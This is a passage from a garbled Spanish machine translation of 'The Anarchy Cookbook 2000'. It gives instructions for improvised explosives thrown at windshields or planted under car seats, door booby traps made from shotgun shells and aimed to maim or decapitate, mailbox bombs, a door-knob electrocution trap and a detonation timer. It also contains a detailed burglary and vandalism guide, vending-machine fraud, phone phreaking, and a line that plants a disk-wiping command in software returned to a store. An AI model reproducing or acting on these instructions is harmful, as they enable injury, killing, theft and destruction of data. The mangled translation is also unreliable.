El separador debe permanecer hermético / prueba de agua para que esto no sople el brazo en el proceso (Créeme. lo hará si usted no es exacta.)

2. De potasio puro. No salitre, o cualquier mierda de esas. Este debe ser el elemento puro. De nuevo, esto puede resultar difícil de encontrar. Pruebe con un profesor de química en la escuela. Dile que lo necesito para un proyecto, o alguna mierda de esas. Trate de obtener la pieza más grande que puedas, porque esto funciona mejor si un plato sólido, no un polvo. También puede tratar de Edmund Scientific Co. en:

Departamento 11A6C929 Edscorp Edificio.Barrington,Nueva Jersey 08007

o llame al 1- (609) -547-8880

3. Algodón4. Agua

Instrucciones:

Tomar el algodón y rellenar un poco en un extremo del forro contenedor un lado del separador. Coloque un poco de potasio, sobre el tamaño de una moneda o más grande (con cuidado, y asegúrese de que sus manos estén perfectamente secas, este material reacciona muy violentamente con el agua) en ese lado y el paquete de bien con todo el algodón que puede encajar. Ahora atornille la tapa firmemente.

En el otro lado del separador, llenarlo con la cantidad de agua que se puedan ajustar, y el tornillo que la tapa firmemente. Ahora se encuentra en posesión de un explosivo compacto hecho algo estable. Para explotar, tirarlo en algo! El agua reacciona con el potasio, y BBBOOOOOOMMMM! Funciona muy bien en las ventanas o parabrisas, ya que los fragmentos de vidrio van a todas partes (un paso atrás) y extraer material aparte. Cuanto más grande sea la pieza, mayor es el boom. Si no puede encontrar el potasio, intente buscar de sodio puro, que funciona bien también.

PD: También se puede colocar este pequeño lechón bajo el volante de un coche de alguien que odias ... (Espera a que "ellos por encima del que uno!)

168.Your Derechos Legales de Éxodo

Page 246: 106652012 the Anarchy Cookbook 2000 Es

Debido a que posee esta pequeña colección de conceptos en su mayoría ilegales, que deben ser conscientes de sus derechos legales si es arrestado (hey, pasa a lo peor de nosotros).

Sus derechos legales son las siguientes:1. Tener una audiencia ante un magistrado o juez, tan pronto como sea posible después

de su arresto.2. Ser notificado de los cargos en su contra.3. Disponer de un conjunto fianza razonable, si se concede la libertad bajo fianza.4. Tener un juicio justo, imparcial ante un jurado.5. Estar presente en todas las etapas del juicio.6. Enfréntate a tus acusadores. (Sin el bate de béisbol)7. Pídale a su abogado de interrogar a los testigos.8. Pídale a su abogado en llamada testigos en su nombre.9. Ser juzgado por un delito una sola vez.10. Recibe ni el castigo cruel ni inusual, si se le declara culpable de un delito y

condenado.

NOTA: ¡¡¡Estos derechos son para después de su arresto, y no incluyen la lectura de los derechos, etc Si estos derechos son violados de ninguna manera, que pueden ser causa de anulación del juicio, o la liberación, incluso total.

169.How La ley protege la delincuencia juvenil por Exodus

Los menores acusados de violar la ley se conceden algunos derechos especiales destinadas a proteger, a causa de su edad. Si un menor es acusado de un delito punible con una pena en un reformatorio o centro de detención juvenil, se le garantiza el derecho a:

1. Permanezca en silencio y no incriminarse a sí mismo / misma.2. Se colocarán en lugares distintos de los delincuentes adultos, mientras que se

encuentran encarcelados.3. Que se le notifique antes de una audiencia de los cargos en su contra.4. Ser entregado a sus padres o tutores después de firmar una promesa escrita de

comparecer en el juicio (a menos que el niño pueda huir y no regresar a la corte a menos que sea peligroso o puede ser él mismo en peligro si es enviado de vuelta a casa).

5. Ser juzgado en los procedimientos que están cerradas al público.6. Tiene un registro de los procedimientos realizados, en el caso de que se necesite

para una apelación en el futuro.7. Ser representado por un abogado.8. Tener un abogado designado por el tribunal si no puede pagar uno.9. Confrontar a sus acusadores.10. Tiene su abogado interrogar a los testigos.

Una vez más, estos derechos son para después de haber sido detenido.

Misiles 170.Down el camino "por el Éxodo

Este misil es bien llamado, ya lo mejor se desplaza por una calle o carretera. Esto no es más que Phun inofensiva para asustar a la mierda viva fuera de los coches que se acercan.

¿Cómo hacer un misil

Todo lo que necesitas son las siguientes:

• Hairspray puede, o alguna otra cosa con el propulsor inflamable (no use pintura en spray imbécil, tiene un gran lío!)

• caja de fósforos ordinarios• cinta (claro si es posible, sus más delgada)

Page 247: 106652012 the Anarchy Cookbook 2000 Es

• Pistola de munición o el diábolo (use BB si es posible)

Instrucciones:

Tape la caja de fósforos a la parte inferior de la lata, ya sabes, la parte cóncava. Es posible que desee para organizar los partidos para que se extienden por una amplia zona de la parte inferior de la lata, pero en conjunto cerca.

Agite bien la lata vigorosamente hasta. Ahora coloque la lata en su lado con la boquilla del señalado se puede en la dirección que quiere que vaya, por un camino, una rampa, a su hermana, etc. Ahora, de pie un poco hacia atrás, y disparar a los partidos. Hay que sacar a unos 30 metros por segundo! ¿Qué sucede en caso de que no podría decir, es el BB llega a los partidos y hace que una chispa, y en la misma época, los pinchazos del fondo débil de la lata. A medida que el propulsante rocía, se espera entra en contacto con la chispa, y listo. Si no haces bien va a volar un montón de dinero porque cada uno sólo puede utilizarse una vez, así que experimentar para encontrar mejores resultados.

En El misil aire:

Compilar el cohete como se dijo antes, y poner en posición vertical sobre un soporte de algún tipo con la parte inferior accesible. Coloque una sección de tubo de PVC de 95 ° preferido y disparar en el tubo de PVC, que debe dirigir la BB hacia arriba, y la lata debe despegar. Experimento w / latas diferentes, es difícil encontrar los que funcionan perfectamente, y aún ir más alto de 30 pies

171.Phun Con cartuchos de escopeta por el Éxodo

Este phile es para aquellos que no se preocupa por ellos mismos o la persona que quiero joder con esto. (En definitiva, un maniático de mierda!)

DoorBlamsCartuchos de escopeta son maravillosos. Se pueden utilizar en casi cualquier situación en la que el dolor o la amputación de miembros se refiere (incluyendo la suya propia si no se es extremadamente cuidadoso. La mejor manera de utilizar los depósitos, es la DoorBlam. El DoorBlam es una mezcla simple de una capa pegada a la parte de atrás de una puerta con el botón de encendido de espaldas a la puerta (por lo que sopla en contra de la puerta). Ahora bien, colocar en algún lugar donde se va a hacer el daño que usted desea. es decir, cerca de la cima de la decapitación, el medio de la muerte lenta, o bajo como para que las víctimas rótulas volar por la habitación. Ahora cinta de una chincheta contra una pared o algo que la parte de los golpes de las puertas en contra. la cinta a la pared para que el punto se asoma a través de la cinta y colóquela de manera que se golpear el botón de ignición en caso de choque ... Es así de simple. el dolor al instante!

Largo Serie ExplosivosSe trata de un explosivo más difícil que he tratado de hacer (las personas que conozco han perdido dedos y manos a este hijo de puta poco) Si usted tiene una VVVVERY sigue la mano, que podría llevarse a cabo. Ignite botones suelen tener un poco de fuerza para hacerla estallar, con tanto cuidado y presione ligeramente un rumbo a través de la cinta y la cinta a la parte posterior de la carcasa, con la punta de la tachuela de tocar ligeramente el botón. Añadir más cinta en la parte posterior para mantener el pasador en su lugar. Si todavía tiene las manos en este punto, considérese afortunado. Ahora hay que añadir un peso a la parte táctica de fin de asegurarse de que toque el suelo primero. Grabar pequeñas piedras o hacer el depósito por poner cargas pesadas hacia el botón de ayuda. Colocación de un cracker (sí una galleta (galletas saladas, ¿alguien?)) Entre el puño de punto y el botón ayuda a prevenir la detonación sobre la proyección, lo que sucede. Ahora bien, cara o cruz alta y lejos de ti, y correr como MIERDA hace después de comer en México.

Page 248: 106652012 the Anarchy Cookbook 2000 Es

Accesorios 172.Electronic por Exodus

Algunos creen en la phreaks abajo-n-sucia personalización de los equipos por la elaboración de ellos mismos ... no yo! Yo creo que el otro debe construir las cosas, y te lo roban y utilizarla más tarde. Esta es una lista de lugares donde se puede obtener de los dispositivos que otros sabios han construido por la mano. Pero después de todo, una buena Phreak puede tomar un tema pre-hecho y adaptarlo a sus necesidades .....

Inhibidores de radar:El "Eclipse" $ 199.00

T.E.K. DistribuidoresPO Box 32287Fridley,Minnesota 55432 (612) -783-1666

Vigilancia:molestando fone, sistema fone de grabación., etc ..

EDE catalogar $ 5PO Box 337Búfalo,Nueva York 14226 (716) -691-3476

USI Corp., el catálogo: $ 2 PO Box PM-2052Melbourne,Florida 32902 (407) -725-1000

Protector de catalogar $ 5PO Box 520294-MSalt Lake City,UT 84152 (801) -487-3823

Gratis el catálogo: 1-800-732-5000

SpyMart catalogar $ 4PO Box 340-MMorehead City,Carolina del Norte 28557

MICRO-VIDEO:Supercircuits Catálogo de $ 313552 Research Blvd.. # B-2Austin,TX 78750

Escáneres:CRB gratis el catálogo dePO Box 56Commack,Nueva York 11725

HPRPO Box 19224PMDenver,CO 80219(Solicitud de información, supongo?)

MISC:Información ilimitada <<< --- MIERDA genial, las cosas buenas.PO Box 716,Departamento PM294 (Un poco caro, así que prepárate para Amherst, NH 03031 TARJETA!)

Catálogo gratuito (w / orden, de lo contrario $ 1.00)

Edmund Scientific (siempre un lugar cojonudo para encontrar al pequeño Departamento 14D2, meollo de la cuestión electrónica que componen C908 EdsCorp Edificio. cajas de colores, y similares)Barrington,Nueva Jersey 08007

Page 249: 106652012 the Anarchy Cookbook 2000 Es

173.Drip temporizador por Exodus

Otro método de retardo de tiempo para los explosivos que se detonaron por medios eléctricos, es el temporizador de goteo. Llenar una 'holgada' con agua y después añadir sal tanto como el agua se mantenga. Selle ella, dejando un poco de aire en su interior. Luego, la cinta en los dos hilos de contacto de la que se ha roto el circuito, en el interior de un vaso grande. Coloque el acolchado de la copa. Haga un agujero en la parte superior de la 'holgada', donde hay aire, y luego hacer un agujero en el fondo para permitir el drenaje de agua en la taza. Como cualquier figura de Einstein, el nivel de agua salada en la taza con el tiempo conducen la electricidad en el momento tanto el agua toque los cables, completando así el circuito. Todavía tengo que probar este temporizador, y yo tengo los planos de un idiota total, phreaker, no obstante, y dudo que funcione con cualquier fuente de alimentación en 12v.

174.Stealing por Exodus

Es extraño cómo el número de archivos que hay por ahí que tratan de documentar el arte de robar. Después de todo, es un arte. Usted tiene que estar tranquilo, suave, persistente, paciente. Robar no es una operación planificada durante toda la noche. Usted debe tratar de preparar a por lo menos durante una semana o más en la planificación de robar a una casa, y más aún cuando a partir de un negocio. La hora del cuento, kiddies:

Hace mucho tiempo, así, en el último año, mis amigos y me di cuenta de que el complejo de edificios en nuestra ciudad era el lugar perfecto para obtener no remunerado-de los elementos. Nos enteramos de todo lo que pudo sobre el complejo, que estaba a unos 365.000 pies cuadrados, y cada compañía constaba de una oficina (completamente equipadas con material informático frío), y 10.000 pies cuadrados (aproximadamente) de almacén, todos conectados entre sí, y todo el nivel uno. Esta información fue obtenida a través de varias llamadas a la comisión municipal (consejo de desarrollo, o alguna mierda de esas, el lugar que usted llama de permisos de construcción, etc.), Y se obtuvieron los planos de todo el complejo. Habíamos planificado una ruta desde la entrada lateral a través del almacén, y en las oficinas, donde por lo general todas las cosas buenas ubicados. Ahora que hemos tenido nuestra ruta, lo único que necesitaba era un plan para entrar. Dado que este fue nuestro primer trabajo importante, nos pasamos unas buenas semanas en la preparación de pocos. Durante el tiempo de nieve, hemos trabajado w / una empresa para palear las aceras del complejo. Una noche, aproximadamente a 23:00, Nos detuvimos frente a una pala de nuestro lugar de trabajo planificado, Campbell'Sopa de s, en el condado no había nadie allí, excepto los empleados de limpieza que limpian el lugar (o eso creíamos). Le pregunté al portero si podía usar el baño (yo tenía que ir demasiado) y me dejó entrar debo haberlo sorprendido cuando supo exactamente dónde estaba el baño! Cuando me dirigía a él, que analizan en busca de cámaras de vídeo, armas de fuego y receptores infrarrojos (pequeñas cajas en las entradas con un cuadrado de cristal negro alrededor de 1 "cuadrados aproximadamente a la altura de rodilla a cada lado). Nada. Las puertas tenían la seguridad de detección magnética en la parte superior, y también las ventanas. Para que alguien irrumpe en medio de un lugar obvio como una ventana grande, estúpido. Para mi sorpresa, hubo algunos perdedores trabajando hasta tarde, y no me importa que yo estaba allí en absoluto. Tome otra Viverin chicos ', no voy a estar aquí mucho tiempo. El olor de café negro era sofocante. El baño se encuentra de nuevo por la entrada de la oficina para el almacén, y para mi sorpresa, que estaba abierta! Las luces estaban encendidas, y el lugar estaba completamente vacío, excepto por unos pocos restos de cartón y estantes, y que las puertas laterales bendecidos. Me acerqué a la puerta para examinarla. ni seguridad, ni cámaras de video en el almacén, nada de nada. impares, por lo general estos almacenes se mantuvo firme como un coño putas. Sin embargo, parecía que estaban empacando para mover alguna parte. Cajas en los escritorios de oficina, etc. La puerta estaba cerrada con un cerrojo de seguridad clave (para recoger el dolor) y un habitual pomo de la puerta de bloqueo de teclas . No hay problema. que necesitaba para detener ese cerrojo de ser cerrada, así que busqué algo para usar .... ¡ajá! Hubo algún material extraño, como el alumbre. papel de aluminio en

Page 250: 106652012 the Anarchy Cookbook 2000 Es

el suelo, flexible, sin embargo, de un color negro. I sacó una pequeña llave Allen (un ladrón no va a ninguna parte sin una herramienta de abrir cerraduras pequeño) y hacinados suficiente de las cosas en el ojo de la cerradura de modo que una llave no puede ser introducido lo suficiente para dar vuelta, y el personal era para lo que se retiró a cabo. Viola! Volver al punto de esta historia. Cuando llegó el momento de hacer nuestro movimiento, algo extraño sucedió. El lugar fue abandonado durante 3 días seguidos, la mayoría de equipos de oficina retirado, y la puerta entreabierta, para los 3 días . Todavía decidió entrar a través de la ruta planificada. En 1:30 AM nos dirigimos a la puerta lateral, y lo que es una sorpresa, el cerrojo estaba abierto. Ahora a la palanca de bloqueo. Estaba cerrada todavía, aunque no es un problema. Cerraduras de perilla suele tener este aspecto:

|-La toma de pared> -------------------------- |) d ------------------------------- | o | | o |) r |) |) ------------------------- | |-La toma de pared>

La pieza superior de deslizamiento es de aproximadamente ¼ "de ancho en las cerraduras populares, con la barra hacia arriba, si se abre la puerta hacia el exterior. Con la más pequeña llave allen que puedes conseguir, lo meto y repetitiva empuje y deslice de nuevo hacia el mando, pero don "No dejes ir, porque tiene un resorte y se ajustará en su lugar otra vez. Ahora, para la barra más grande. Tome otra de las claves y calzar en la ranura donde la barra entra en el otra pared (sin el mando sobre el mismo)! y hacer lo mismo. Esto será mucho más difícil que con la lengua pequeña, pero si se practica al igual que usted debe tener, se abrirá con un mínimo esfuerzo. Ahora estábamos en el interior. Corrimos a través del almacén, aunque la puerta del almacén / oficina (estos rara vez son bloqueados, pero trata de prepararse para ella antes de tiempo por "abarrotar el bloqueo" como yo lo hice) y en la oficina. El lugar estaba vacío, no sólo los estantes, escritorios, sillas y cajas. Las cajas contenían módems, placas madre, tarjetas de autobús, impresoras, cables, cable fono, y la otra con un ordenador portátil Zenith! No jodas, esta es una historia verdadera! Tomamos todo lo que podía llevar (5 personas). Tomamos todo lo anterior, así como tóner de la impresora, Fones, tomas fone, documentos, sillas de escritorio, cajas y bolsas de aislamiento libre de estática (tipo), hasta las cosas pequeñas, como la mierda de los enchufes, bombillas, cualquier cosa! ! Nos fue muy loco, y estaban en 2 min 30 seg. (Siempre se establece un límite de tiempo)

Acabamos tirando la mitad de la mierda, pero se sentía muy bien sólo para tomar cualquier cosa que no era la nuestra! Que desde entonces han hecho otros "trabajos" con mucha más precisión y esfuerzo, así como mejores beneficios. Estos son algunos consejos que deben seguirse cuando se trata de robar:

• GUANTES!!!!

• Mochilas para todo el mundo para poner el botín pulgadas

• Siempre caso de la articulación por lo menos durante una semana y mantener registros documentados de que se vaya cuando, a qué hora se cierra, las luces sincronizadas, etc ..

• Tener por lo menos 4 phriends con usted, y, por favor, asegúrese de que sepan lo que están haciendo, no idiotas permitido!

Page 251: 106652012 the Anarchy Cookbook 2000 Es

• Trae herramientas: llaves allen pequeñas, ambos tipos de destornilladores, de tamaño estándar y pequeño, hoja de sierra, alicates y decapantes, pintura en spray para salir de su asa en la pared, martillo, mazo, armas de fuego si es posible, linternas (duh), alambre bueno para puerta de seguridad re-enrutamiento, y un cortafríos.

• Designar a una persona para llevar a todas las herramientas SOLO-no lo tienen material de recogida y se mezcla con las herramientas, esto sólo le hará perder más tarde si es necesario buscar una herramienta de abeto rápidamente.

• Designar a una persona a quedarse en la puerta y vigilar.

• Designar a un temporizador, que tiene una luz cronómetro.

• Haga corre ya no es el 3 MIN. Pero esta vez es extremadamente alto-Trate de mantenerse lo más bajo posible.

• Vehículo de la partida (preferiblemente no un camión furgoneta o camioneta, esto será muy sospechosa a los cerdos .. er.I decir policías. Y no la velocidad, ni nada, esto sólo llama la atención. Cubra las placas hasta que justo antes de llegar a su culos en marcha, para que nadie pueda reportar las placas a los cerdos .. oops!, maldita sea, lo nuevo, los policías. Asegúrese de que usted retire la cubierta antes de salir.

• Siempre tenga linternas apuntando hacia abajo a menos que sea necesario, se arrastran debajo de las ventanas, no hay gritos, incluso si usted encuentra algo de mierda Phucking fresco, pensándolo bien, tal vez pintar el mango es un poco tonto, por lo que hay que olvidar que, use ropa oscura SOBRE regular, no sospechoso ropa (se cambian lo primero en el coche)

• No alardear de sus resultados en público, sólo en el módem o en el BBS, y nunca dar los nombres de lugares, phriends y nombres exactos de las cosas tomadas, (acaba de decir que "tomado prestada" un 486DX 33 placa base, no digas que es un Intel 486DX 33 MHz para un IBM PS / 1 modelo 50, número de serie XXXXXXXXXXXX. que es simplemente tonto)

• Tener Phun! y nunca robar a su vecindario.

• Si se rompe en las casas, nunca se mueven cosas de un lado, cuanto más se tarde la familia yuppie darse cuenta de que estaban allí, mejor.

• GUANTES!! ¡¡!

• Para ponerse en Windows: ventana de disparar con pistola de aire comprimido, y un lugar transparente y pegajoso libro de tapa dura que cubre la ventana sobre el agujero, es de esperar el impacto de la vacuna fue suficiente para romper el cristal, y se inclina o empuje el vaso cubierto, no golpear o patear, y verá que la mayoría de los cristales se pegan a la cubierta, y hará que el ruido considerablemente menor.

• Entrar a través de las ventanas del sótano de preferencia bajo una cubierta o pasos.

• Asegúrate que la gente se ha ido por la noche y Los vecinos son el sueño (ir por alrededor de 2:30 AM)

• Toma cosas que se venden fácilmente a sus amigos, y no perder el tiempo tomando cosas que se ven limpio, acaba de tomar los conceptos básicos: electrónica, informática, TV, VCR, algunas joyas de cosas que usted puede fácilmente corvejón, preferiblemente sin inscripciones, asaltar la nevera , tome fones de buena calidad, equipo de música equipar., altavoces, etc.

Page 252: 106652012 the Anarchy Cookbook 2000 Es

• Siempre caso de que el exterior de la casa en busca de etiquetas de seguridad que las familias yuppie quiere poner a la vista.

• ¿Es la mierda maliciosa, como cortar todas las líneas fone en casa, cortó cojines del sofá y dar la vuelta sobre ellos para que luzcan perfectamente normal;! Disparar un agujero en su tanque de peces, (todos los peces yuppies propia), la ropa de barra, y luego volver a ponerlos en el cajón; desenchufe nevera, forma de ajuste del termostato hasta 99,9 °, dejar enchufado desagüe y deje el grifo corriendo un poco, (durante 6 horas!), lo que no puede tomar o llevar a cabo, destruir de una manera sutil, -si usted no puede llevar a cabo las 130 libras de madera altavoces estéreo de casos, reducir los conos, salto de bolígrafos abrir y frotar en la alfombra con los zapatos; ejecutar un imán sobre casetes de audio y VCR y disquetes, y cualquier cosa más sutil que alegrar su día.

INFORMACIÓN 175.MISCELLANEOUS por Exodus

Fácil de explosivos:

• Rellene el caso de Kodak de la película (ya sabes, el cilindro negro con la tapa gris) con explosivo de su elección. Taladre un agujero en la tapa gris, inserte el fusible, y la cinta de nuevo juntos muy estrechamente. Luz.

-O-

• Haga un agujero en el que la tapa gris hacia el exterior, e insertar un M-80 con el fusible de pasar por el agujero y volver a cerrar, grabando firmemente TODO el caso. Lugar en el buzón de plástico, puerta de la luz, cerrar, y obtener lo más lejos posible! Debido a la apretada del espacio aéreo, el poder destructivo de la explosión se incrementa 5 veces. Trabaja bajo el agua también, con una gota de cera, o, preferiblemente, cemento de caucho alrededor de donde el tapón y mecha se encuentran.

-Y-

• Llenar un vaso de coca cola / pepsi botella con gas la parte 1, 1 parte de azúcar, y 1 parte de agua. Wedge un M-80 en la parte superior hasta la mitad. Agite bien el envase, el lugar en el buzón (es de esperar con el correo {jeje!}) La luz, y obtener de una puta vez. Esto lo envía la metralla cristal por todas partes, incluso a través de su correo.

Pomo de la puerta Shocker:

• Tienda un cable desde una ranura en la toma de la pared en el soporte en la pared que se inserta la lengua de la perilla en el. Realice un nuevo cable de la otra ranura de un lugar discreto en el picaporte. ¿Qué tal una cuchara * * ¿verdad?

Los bucles de teléfono: (recuerde, el tono de conexión + silencio =)

NÚMERO | Tono / Silencio (T / S) Final | ESTADO (la conexión)-------------------------------------------------- -------------------? -??? -??? -?? S no coinciden1-619-748-0002 tono definido T

x-xxx-xxxx-749 T tono definido? -??? -??? -?? S no coinciden

1-619-739-0002 tono definido Tx-xxx-xxx-xxx1 S no está seguro de partido

Page 253: 106652012 the Anarchy Cookbook 2000 Es

x-xxx-738-0002 T definidax-xxx-xxx-0020 S definida

x-xxx-7xx-0002 T definida? -??? -??? -?? S no coinciden

En realidad, cualquier 1-619-7x9-000X ofrece detección de tonos, la búsqueda de la conexión en silencio otro es un poquito más difícil.

Si alguien se las arregla para completar algunos de estos, o cualquier bucles, por favor hágamelo saber.

Lo único malo de circuito cerrado, es que con el tiempo la Gestapo descubre el uso excesivo de la línea, y le asigna el número a cualquiera que quiera un nuevo número de su fone. Luego, cuando phreaks comenzar a utilizar la línea de nuevo, pensando que es un bucle, consiguen un cabreado yupi quien ha rastreado la llamada, y eso es como poner los huevos justo en la puerta y cerrándola. El operador se quejan en su cara, y algunos dicen tonterías como que tiene su número y reportará cualquier alteración a la cooperación fone. si lo vuelve a ver.

Simple Virus / Easy Way Para devolver un programa copiado (hehe!)

Cuando usted compra un juego, o algo de una tienda de informática, copiarlo, y quiere devolverlo (sé que todos ustedes hacen esto), a veces toda la tienda que hace es volver a lo de celofán y se remonta en los estantes sin ser de nuevo la prueba. Si los discos originales tienen un archivo AUTOEXEC.BAT en ellos para iniciar la copia / descompresión en el arranque, sólo tiene que editar para decir:

cd \del c: *. *y

Eso va a hacer alguien real de día divertido, especialmente si se trata de la tienda para probarlo. O bien, en la mayoría de los casos, la tienda no se aceptarán devoluciones de mercancía, si no es defectuoso, por lo que TI DEFECTO. Esto se hace mediante el uso de un programa que muestra la fecha y hora de los originales fueron modificados por última vez (ver para ello, antes de instalar el programa!!), Como DOSSHELL o XTGold. A continuación, establezca la fecha y hora de su ordenador para que coincida con la fecha y hora originales (aprox). Instale el programa, y / o copiar los originales y manuales. Ahora jodas con el archivo de la descompresión (por lo general PKUNZIP), el archivo de instalación, y cualesquiera otras que se ven. Ahora la tienda no tiene razón, y debe aceptar el producto como un retorno, o, a veces se le dará un cheque a cambio de la $ $, y enviar el programa de nuevo al fabricante, lo cual es bueno, porque entonces se vuelven a copiar, volverse a cerrar, y volver a poner en los estantes de algún lugar para otro phreaker Hack!

(Si lo anterior de fecha / hora coincidencia es demasiado de un dolor para los retrasados realmente hacia fuera allí, establecer la fecha de su equipo / hora para todos los últimos cercanos a los originales, y follar con todos los archivos, lo que los hace todo el partido.)

Batería Bombas:

Las baterías como Duracell, Eveready, Energizer, etc .. están especialmente diseñados para uso en el hogar y no en cualquier condición, explotar cuando se conecta simplemente a la otra. Por lo tanto, las baterías genéricas son necesarios. Estas baterías se pueden obtener en el país paleto, o de un mayorista de mierda. He oído hablar de phriends poniendo 9Vs en el microondas de mierda por un minuto o así, y esto se supone que desactivar el "detonador protector", pero quien pone las pilas en un

Page 254: 106652012 the Anarchy Cookbook 2000 Es

horno de microondas, debe tener las pilas explotan en ellos. Nunca supe si 2 rollos de 9v conectados realmente explotar. Espero que sí.

Todos los boxeadores Blue?

No muchas personas utilizan las cajas azules en estos días. Se han convertido en un peligro eminente para phreakers. Ma Bell tiene un nuevo equipo para detectar el uso de cajas de emisores de tono, y sobre el único lugar seguro para las llamadas de caja es el teléfono de pago práctico-excelente en la final de la cuadra. La única forma de las llamadas cajas de hoy es apagar a otro sistema de conmutación con otro número: es decir-

Llame a una tienda como Toys-'R' Us, (1-908-322-6065 Livingston,Nueva Jersey) Y pregunte por el técnico (videojuego) del departamento. Esto cambia el número de la anterior a la extensión del departamento, por lo general y la extensión, pero puede ser totalmente diferente # que se envían a mientras se encuentre en espera. Esto es muy bueno. Mentira que el empleado en el departamento de tecnología., Y esperar a que cuelgue primero. Que usted se desconecta de su departamento, pero no de las interconexiones de la tienda. (Incluso podría ser posible marcar un número y obtener otro departamento en este punto). Esto es como 'apilamiento' troncos. Su tono de marcado (dentro de la tienda) puede tener un tono ligeramente mayor / menor que un tono de marcado en tu casa. Esto es lo que quieres. Ahora, el golpe 2600 a través de la línea, y usted debe tener acceso a un tronco, y Bell Labs creen que la tienda lo hizo, y que usualmente no se cuestiona porque el equipo podría pensar que es parte de su sistema de búsqueda. (No es 100% seguro, prueba de todo)

Cuando alguien (de preferencia que no le importa una mierda) las llamadas, marque * 69 a llamarle de nuevo (si su área se suscribe a esta función). ¿Qué debe suceder es que el * 69 tonos pide a la Campana equipo para volver a llamar a la persona. La computadora hace el llamado en este momento. Ahora, cuando su amigo coge, lo mierda de colgar en la primera. Ahora el equipo está recibiendo el tono de marcado primero, y luego lo pasa a ti. Si soplas 2600 en este punto, el equipo puede pensar que es su propio equipo haciendo la llamada. Realmente no estoy seguro acerca de esto. Esperemos que este funciona, pero no puedo probarlo porque algunos jodido, mierda total, la boquilla se duche, cerdo hijo de puta me rompió el cuadro de lunes a viernes. <frown> cajas de MF no son tan difíciles de conseguir. Muchas de las tiendas de hobby, tiendas de instrumentos musicales o almacenes electrónicos pueden vender el cuadro de MF sí mismo, o una que detecta los tonos, que pueden ser utilizados en el modo inverso.

Los buenos números de teléfono técnicos:

A veces, la parte más difícil de obtener soporte técnico es encontrar un lugar para buscar. Un lugar fácil es el MIT (sede de los Phreaks ORIGINALES) Encontrar el número de la escuela de ingeniería electrónica, llame y diga que le gustaría que el número de (dar a la habitación # inventar uno si tiene que hacerlo), o llame a la persona a cargo de asignaciones dormitorios (comprar un libro de la universidad si es necesario). Finalmente, si se hace bien, tendrá una lista de posibles # s, y establecer el módem en la exploración, y buscar la detección de portadora. Uno de estos nerds ... ahm! Me refiero a genios debe tener una computadora con un módem, y estos chicos responderán alrededor del 100% de sus problemas técnicos.

Cámara oculta:

Si usted está en bromas pesadas como yo, que aquí es un libro para usted:

"El Manual Oficial de Segunda Cámara indiscreta"

por: Peter Van Der Linden

Page 255: 106652012 the Anarchy Cookbook 2000 Es

Hay cientos de buenas bromas y estafas telefónicas, así como una sección de chistes de ordenador, con todo un programa de re-escribir el archivo COMMAND.COM ser más divertido que nunca.

176.Shaving bomba Crema por Exodus

Esto no puede ser en realidad lo que consideraríamos una bomba, pero es una idea cojonudo gran phuck a alguien. Usted necesitará:

• (1) Persona que odias que tiene un coche.

• (1)-contenedores de nitrógeno líquido (pruebe una tienda de la ciencia, o Edmund Scientific, que se menciona en varios lugares en este libro de cocina)

• (6-10) de latas de crema de afeitar genéricos.

• (1)-Tarde libre (preferentemente en temperaturas de congelación fuera)

• (1-o más)-pares de pinzas, para cortar y pelar.

• Algunos phriends.

Instrucciones:

Encuentre a alguien que es dueño de un coche pequeño y compacto, y gestionar para averiguar dónde lo guarda en la noche (o durante su ausencia!) Ser capaz de abrir el coche en varias ocasiones .. Colocar una lata en el nitrógeno líquido durante aproximadamente 30 segundos. Sacarlo y cuidadosa y rápidamente pelar el metal fuera del contenedor, y usted debe tener un congelada "bloque" de la crema de afeitar. (Es útil tener más de un contenedor, y más phriends) se Lanza en el coche y hacer lo mismo con todas las latas. Una docena o más de "bloques" de este tipo puede llenar y ligera PRESURICE un coche pequeño. Cuando se abre la puerta (es de esperar que no se da cuenta del lío en el interior debido a la niebla de Windows), que será cubierto con kilos de crema de afeitar es una perra para salir de la tapicería.

PS - Trate de conseguir una es la guantera!!

177.Another buena manera de estafar a un cambio o una máquina de bebidas por el ácido ƒlèsh

En primer lugar, obtener una buena nueva dólares para trabajar. Asegúrese de que no hay rupturas en el mismo. Ahora, se obtiene una fina pieza de plástico transparente de 3/4 de la anchura del dólar real. Debe ser un buen 6 "o más. Después, usted necesita un poco de cinta transparente. Cinta adhesiva mágica funcionará mejor. Usted simplemente graban la tira de plástico con el dólar. Sin embargo, usted debe tener cuidado de no a la cinta que más de ½" por el lado del dólar. Pégalo en ambos lados (anverso y reverso, no superior e inferior) del dólar. Ahora, todo lo que tienes que hacer es usar es el siguiente:

Caminar casualmente a la máquina aislada. Saca tu dólar, y lo puso en la máquina. TENGA CUIDADO! Algunas de las máquinas de cambio más modernos cuentan con alarmas! Máquinas más probable, sin embargo, de bebidas o dulces no. Ahora, la máquina comienza a tomar su dinero .... Espera hasta que su tira de plástico es casi todo el camino en la máquina, y luego tirar con fuerza suficiente para conseguir el dólar de la máquina, pero no extraer sus canciones. Si lo hiciste correctamente, usted debió haber recibido todo lo que compró, y todavía tiene su dinero para su uso posterior. En las máquinas de dulces, sin embargo, hacer su selección, y luego esperar y tirar el dólar a cabo. No se preocupe si usted no lo recibe en los primeros intentos. Me tomó cerca de 5 intentos para llegar a dominarlo. Lo hace, yo repito funciona como un hecho si se hace

Page 256: 106652012 the Anarchy Cookbook 2000 Es

correctamente. Si usted no puede conseguirlo, sin embargo, ya sea la máquina es demasiado sofisticada, o se pone la cinta demasiado alto sobre el dólar. Que se diviertan!!

178.Lockpicking para el principiante EXTREMA ... por el ácido ƒlèsh

Esto es realmente un buen método para abrir las puertas que están cerradas. El único problema con esto, sin embargo, es que sólo funciona para las puertas de apertura hacia el exterior. OK, aquí vamos ....

1. Date cuenta de que no está trabajando con el bloqueo real, pero que lo que sobresale entre la puerta y la pared.

2. Vea cómo esa cosa se curva en un lado? Bueno, eso es lo que vamos a hacer uso de.

3. Adquirir un gran papel-clip. Si es demasiado corto, no va a funcionar. Hay que tener también un cordón de zapato. Ahora, en la construcción ...

4. Enderezar el papel-clip.

5. Lazo un extremo del clip de papel en todo el cordón del zapato. El cordón debe ser de aproximadamente 4/5 en un lado de la pinza y 1 5 / en el otro. Vamos a ver si puedo dibujar.

------------------ ******************************** ***** - * *******

--- Es el clip de papel*** Es el cordón del zapato

Eso no es muy buena, pero espero que usted consigue el cuadro.

6. Todo lo que tienes que hacer ahora es la curva del clip de papel (no, no lo voy a dibujar)

7. Con la curva de papel-clip, que se pegue entre la puerta y la pared, detrás de la cosa de metal que sobresale entre ellos.

8. Alimente a través de la mano con ustedes, hasta que pueda agarrar ambos lados de la zapatilla.

